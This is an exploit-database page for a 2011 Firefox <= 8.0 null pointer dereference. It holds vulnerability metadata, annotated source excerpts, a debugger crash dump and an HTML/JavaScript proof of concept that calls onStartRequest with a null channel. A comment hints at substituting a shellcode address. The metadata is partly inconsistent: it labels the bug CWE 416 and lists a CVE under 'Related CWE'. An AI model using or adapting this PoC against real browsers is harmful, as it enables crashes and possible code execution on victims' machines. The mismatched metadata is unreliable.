Firefox - exploit.company

vendor:

Firefox

by:

0in (Maksymilian Motyl)

7.5

CVSS

HIGH

Null Pointer Dereference

416

CWE

Product Name: Firefox

Affected Version From: Firefox <= 8.0

Affected Version To: Firefox <= 8.0

Patch Exists: YES

Related CWE: CVE-2011-0083

CPE: a:mozilla:firefox

Metasploit: https://www.rapid7.com/db/vulnerabilities/mozilla-thunderbird-cve-2011-0083/, https://www.rapid7.com/db/vulnerabilities/mfsa2011-23-cve-2011-0083/, https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2011-0083/, https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2011-0885/, https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2011-0888/, https://www.rapid7.com/db/vulnerabilities/suse-cve-2011-0083/, https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2011-0886/, https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2011-0887/, https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2011-0083/

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux

2011

Firefox <= 8.0 null pointer dereference PoC exploit

A null pointer dereference vulnerability exists in Firefox versions <= 8.0 due to improper validation of user-supplied input. An attacker can exploit this vulnerability by crafting a malicious HTML page and convincing the victim to open it. This will cause the application to crash and potentially allow arbitrary code execution.

Mitigation:

Upgrade to the latest version of Firefox.

Source

Exploit-DB raw data:

# Firefox <= 8.0 null pointer dereference PoC exploit
# Author: 0in (Maksymilian Motyl)
# Tested on Firefox 8.0/4.0 on windows and Firefox 7.1 on Linux
# Lets see in code:
# $ cat ./mozilla-release/content/base/src/nsObjectLoadingContent.cpp

NS_IMETHODIMP nsObjectLoadingContent::OnStartRequest(nsIRequest *aRequest,
                                       nsISupports *aContext)
{
  if (aRequest != mChannel) { // our pointer is checked there, mChannel is null. I think maybe some magick in js can help there
    return NS_BINDING_ABORTED;
  }
  AutoNotifier notifier(this, PR_TRUE);

  if (!IsSuccessfulRequest(aRequest)) { // go


//----------------------------------------------------------------------------------
PRBool nsObjectLoadingContent::IsSuccessfulRequest(nsIRequest* aRequest)
{
  nsresult status;
  nsresult rv = aRequest->GetStatus(&status); // Code execution is here.

// ---------------------------------------------------------------------------------


DUMP:
  014E7A28   8B7D 08          MOV EDI,DWORD PTR SS:[EBP+8]
  014E7A2B   8B07             MOV EAX,DWORD PTR DS:[EDI] ; access violation when reading 0x00000000
  014E7A2D   8D4D FC          LEA ECX,DWORD PTR SS:[EBP-4]
  014E7A30   51               PUSH ECX
  014E7A31   57               PUSH EDI
  014E7A32   FF50 14          CALL DWORD PTR DS:[EAX+14]

  EAX 0012BFC0
  ECX 00080000
  EDX 00080000
  EBX 03A199E8
  ESP 0012BF44
  EBP 0012BF54
  ESI 03A199C0
  EDI 00000000
  EIP 014E7A2B xul.014E7A2B

$ cat 2011_powrot_komuny.html
<html>
<body>

<object id="dupa">
<script>
RIINDC=document.getElementById("dupa");
RIINDC.QueryInterface(Components.interfaces.nsIRequestObserver);
//RIINDC.mchannel=SHELLCODE_ADDR
RIINDC.onStartRequest(null,RIINDC.QueryInterface(Components.interfaces.nsISupports));
//RIINDC.onStartRequest(RIINDC.mchannel,DWCJWL.QueryInterface(Components.interfaces.nsISupports));

</script>
</body>
</html>